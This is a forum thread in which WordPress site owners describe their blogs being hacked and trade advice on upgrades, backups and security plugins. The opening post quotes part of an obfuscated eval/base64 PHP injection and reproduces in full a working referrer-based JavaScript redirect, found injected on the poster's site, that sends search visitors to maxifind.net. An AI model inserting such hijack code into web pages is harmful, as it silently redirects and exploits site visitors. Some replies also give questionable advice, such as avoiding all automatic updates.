Do You Want To Join The Wordpress Hacked Club?

27 replies
Yes, I'm now a sad member of that group.

Two of my WP sites have been hacked recently. Both on the same server, both old WP installs so I think there must be some kind of security loophole that got exploited.

1) The first hack injected some eval(base64_decode('aWYoZnVuY3 ... code at the top of EVERY php file. I tried to decode it all but it also uses gzdecode and goes very deep into the WP install.

On the bright(?) side it looks like the injected code got broken so it "only" disabled my site rather than run it's hack all the way through. My guess is it's probably some kind of redirect.

2) The second hack injected some script that is difficult to see within the WP php files. It's not in the higher level files like index.php so it's getting inserted at a lower level.

The only way I found out about it was my AVG detected a Exploit Search Engine Hijack when I navigated to the site and when I viewed the rendered source code I found this script:

<script> var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://maxifind.net/index.php?pf_id=361&q="+r.substring(q+2+t.length). split("&")[0]; </script>

We can see on that last line that it's a maxifind.net redirect. Feel free to boycott their site. Grrr!

I scanned my own PC and it didn't turn up any viruses so I don't think I have that iframe virus that has been floating around lately. I think I just got careless by keeping old WP installs that have security holes.

So be sure to keep your WP installs up-to-date and also have a good Wordpress backup and restore process in place.

Wendell
#club #exploit #hacked #join #virus #wordpress
  • Profile picture of the author VeitSchenk
    Wendell,

    how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

    Cheers

    Veit
    Signature

    Connect with me on FB: https://www.facebook.com/veitschenk

    {{ DiscussionBoard.errors[930821].message }}
    • Profile picture of the author WendellC
      Originally Posted by VeitSchenk View Post

      Wendell,

      how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

      Cheers

      Veit
      Ah, I'm embarrassed to say it but it was version 2.04! I think it was the first WP blog I ever created and I forgot to upgrade it over the years. Most of my blogs are now in the 2.6 - 2.7 range. I just have to go back and get them all upgraded to something with a few less security holes...

      Right now I'm trying to see if I can upgrade it without breaking the database. I tried to do an upgrade before on another WP site and it really screwed up the categories since WP at some point made some major changes to their schema.

      I might just end up installing 2.8, reposting all my content manually and taking my lumps with the permalink differences...

      *sigh*

      Wendell
      Signature

      List your no opt-in product here for free: No Opt In Required

      {{ DiscussionBoard.errors[930977].message }}
    • Profile picture of the author danemorgan
      Originally Posted by VeitSchenk View Post

      Wendell,

      how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

      Cheers

      Veit
      2.7 is extremely vulnerable with several DOZEN published exploits.

      The thing is that zero day exploits really aren't that dangerous for folks like us that aren't national houshold names. But once these exploits are published there are forums out there very similar to this one, but with a different focus. People actually post exploits to help out the new script kiddies and sell them software to help them find and attack blogs just like yours.
      Signature
      Did you ever notice that “author” is the root of the word “authority“?
      {{ DiscussionBoard.errors[3616139].message }}
  • Profile picture of the author VegasGreg
    I too had 5-6 WP sites hacked 2 weeks ago. They simply replaced my index page with their "you've been hacked" video. It said that they were Muslim Extremist Hackers.

    Some of the sites were brand new installs that I had not even finished yet and had not backed them up yet.
    Signature

    Greg Schueler - Wordpress Fanatic... Living The Offline Marketing Dream...

    {{ DiscussionBoard.errors[930842].message }}
  • Profile picture of the author PixelPerfect
    If those guys are that clever why don't they hack the Wordpress.org site, would like to see that.
    {{ DiscussionBoard.errors[930872].message }}
  • Profile picture of the author twright
    they make a security plugin for WP, might want to gander at some of those.

    keeps your eyes open, sometimes they do something simple so it appears like thats all they did.
    Signature

    Have patience! In time, even grass becomes milk.~ Charan Singh

    {{ DiscussionBoard.errors[930892].message }}
    • Profile picture of the author kameleon
      I have wordpress site, but didn't have such problems. Probably because I have only few visitors monthly.
      {{ DiscussionBoard.errors[931031].message }}
  • Profile picture of the author JohnnyPhunk
    Definitely gotta keep your WP up to date.

    There's a security scan plugin that helps too.
    {{ DiscussionBoard.errors[931106].message }}
  • Profile picture of the author Lightlysalted
    I used to use wordpress. It is a very powerful piece of blogging software but after being hacked myself i went back to go old fashioned HMTL and javascript. Also wordpress has a habit of running slow at peak times and my users were getting fed up of waiting 30 seconds for a page to load up. HTML is so fast because there is little code to slow the process down and it's the same with PHP.
    {{ DiscussionBoard.errors[931144].message }}
  • Profile picture of the author GuerrillaIM
    I think a lot of WP blogs get hacked due to vulnerabilities in the plugins. Search for "plugin name + vulnerability" before installing to make sure its not a real mess and easy to hack.
    {{ DiscussionBoard.errors[931232].message }}
    • Profile picture of the author edd666666
      I would like to hitch hike on this issue, by asking for advice on how to upgrade. I am a novice on wordpress and don't know how to upgrade it. I have it hosted on bluehost and can access the cpanel but after that I am stumped as what to do. Can anyone offer me any advice on what to do after I am on the cpanel? Thanks,
      ed
      Signature
      “Over 1,000 People Have Used My Unique Pitch System To Achieve Their Publicity Goals... And I’ll Work Personally With You Too, One-On-One To Help You Get On TV!” CLICK HERE
      {{ DiscussionBoard.errors[931339].message }}
      • Profile picture of the author JustaWizard
        Originally Posted by edd666666 View Post

        I would like to hitch hike on this issue, by asking for advice on how to upgrade. I am a novice on wordpress and don't know how to upgrade it. I have it hosted on bluehost and can access the cpanel but after that I am stumped as what to do. Can anyone offer me any advice on what to do after I am on the cpanel? Thanks,
        ed
        Ed, at Bluehost cpanel, click on the Wordpress Icon, then click on "my installs" and you can upgrade from there. Alternately, you can go to your wordpress dashboard for that site, and near the top there should be an "upgrade to 2.8" link.

        Best,
        David
        {{ DiscussionBoard.errors[931399].message }}
        • Profile picture of the author JustaWizard
          The oldest version of Wordpress I've ever used is 2.7.1 - but recently installing WP on a new site I installed 2.8 and had to delete the install because there was some kind of redirect to a link farm site. I suspect it was, ironically, a plugin named "redirect" because I deleted plugins one by one (at BlueHosts suggestion) until I isolated the offending plugin. Now I have 2.8 up and with all the plugins including "redirect" and things have been fine.

          I guess that plugins and Wordpress are just vulnerable???

          David
          {{ DiscussionBoard.errors[931420].message }}
  • Profile picture of the author TheRichJerksNet
    Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

    Its not the version that you run but the security you do on the site. You can NOT rely upon wordpress to secure your site.. You must take matters into your own hands and do it yourself...

    The past five years has seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

    Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

    James
    {{ DiscussionBoard.errors[931479].message }}
    • Profile picture of the author JustaWizard
      Originally Posted by TheRichJerksNet View Post

      Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

      Its not the version that you run but the security you do on the site. You can NOT rely upon wordpress to secure your site.. You must take matters into your own hands and do it yourself...

      The past five years has seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

      Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

      James
      Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

      I admit I'm not green, but not a programmer-type either...

      THANKS!
      David
      {{ DiscussionBoard.errors[931548].message }}
      • Profile picture of the author TheRichJerksNet
        Originally Posted by JustaWizard View Post

        Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

        I admit I'm not green, but not a programmer-type either...

        THANKS!
        David
        Sent you a PM David...

        James
        {{ DiscussionBoard.errors[931596].message }}
        • Profile picture of the author WendellC
          Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

          So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

          Thanks -

          Wendell
          Signature

          List your no opt-in product here for free: No Opt In Required

          {{ DiscussionBoard.errors[932691].message }}
          • Profile picture of the author TheRichJerksNet
            Originally Posted by clickguy View Post

            Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

            So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

            Thanks -

            Wendell
            Yeah ... Do your own updates, do not use any plugins or auto updates - This includes the auto update that wordpress has. This is a huge security risk when you do.

            Also do NOT update as soon as a new release is out, wait until it is stable.

            James
            {{ DiscussionBoard.errors[932724].message }}
  • Profile picture of the author valerieSONORA
    I think I was one of the very first members.
    Signature

    siggy taking a break...

    {{ DiscussionBoard.errors[932703].message }}
    • Profile picture of the author phantom76
      Once about 5 of my wp sites (which I wasn't updating for several months) were hacked by some saudi arabian hacker group. They defaced my front page and installed some malware which will get downloaded if you visit the page Google started showing warnings on searches as "Reported attack site". I was horrified when I saw this. (Stupid of me, I didnt even visit these sites for months).

      They could hack because, i wasn't updating my wp or the plugins. After this lesson, I religiously update all my wordpress installations and plugins as soon as a new update is available. Love the admin panel upgrade option available in the newer versions of wordpress.
      {{ DiscussionBoard.errors[932716].message }}
  • Profile picture of the author Tom Dean
    I had a "seasonal" blog hacked. Didn't notice for months since I rarely checked it until it was getting close to the season. Fortunately they just altered the index page. They got in through an unprotected folder as in - it had no index file.

    Tom
    Signature
    Rush PBN - PRO PBN SETUP - 10 PAGE SITE !!! Premium Theme
    {{ DiscussionBoard.errors[932714].message }}
  • Profile picture of the author MemberWing
    I second suggestion of not updating as soon as Wordpress releases next major update.
    Wait few weeks until dust settles.
    I.e:
    *.*.Y - update is safe immediately.
    *.Y - wait 2 weeks before applying.
    Y.* - wait 4 weeks before applying.

    Gleb
    {{ DiscussionBoard.errors[932744].message }}
  • Profile picture of the author azsno
    I've have a plugin that works easily with Wordpress, to Secure your BLOG...My WP-Padlock program secures Wordpress easily and quickly, and comes with installation video, and info on how to secure the vulnerabilities in Wordpress...

    You can find the plugin in my signature below...

    ~AzSno...

    P.S. If you're wondering about my credentials, I'm a former Network/Security Engineer in Silicon Valley. I'm certified with Cisco PIX, Checkpoint Firewalls, numerous IDS (Intrusion Detection Systems, and Nokia Firewalls and Security Devices...)...I've designed networks and security systems for eBay, Providian Financial Services, UC Berkeley, Lawrence Livermore Labs, and Cal State Hayward...Suffice it to say, I know a little about security...
    {{ DiscussionBoard.errors[958325].message }}
    • Profile picture of the author classdancer
      Just had 10 wordpress blogs Hacked.....
      Just come up with standard wp them and say "HACKED BY ALI" all content gone.
      {{ DiscussionBoard.errors[3615783].message }}
      • Profile picture of the author MemberWing
        to all clients that I build sites, I almost insist to include full blown, off-site, daily or weekly website backup, including all files and database.

        ...and of course to maintain plugins and wordpress upgrades.

        Gleb
        {{ DiscussionBoard.errors[3615800].message }}
        • Profile picture of the author danemorgan
          Originally Posted by MemberWing View Post

          to all clients that I build sites, I almost insist to include full blown, off-site, daily or weekly website backup, including all files and database.

          ...and of course to maintain plugins and wordpress upgrades.

          Gleb
          that's all well and good, but relly, by the time many hacks these days end up getting noticed your backups are compromised several months back.

          These days and these kinds of hacks it is less about street cred and more about cash money. Most of the time, now, if you notice you have been hacked, the hack failed.
          Signature
          Did you ever notice that “author” is the root of the word “authority“?
          {{ DiscussionBoard.errors[3616152].message }}
  • Profile picture of the author danemorgan
    The reason Wordpress seems insecure is the same reason Windows seems insecure.

    Potential.

    If you are going to write a script to inject code into something are you going to spend your time trying to attack a 1,000 user base or a 1,000,000 user base? The work is the same, the payoff is dramatically different.

    A WordPress version is already being hacked at by hackers before most Wordpress users even know it exists.
    Signature
    Did you ever notice that “author” is the root of the word “authority“?
    {{ DiscussionBoard.errors[3616181].message }}

Trending Topics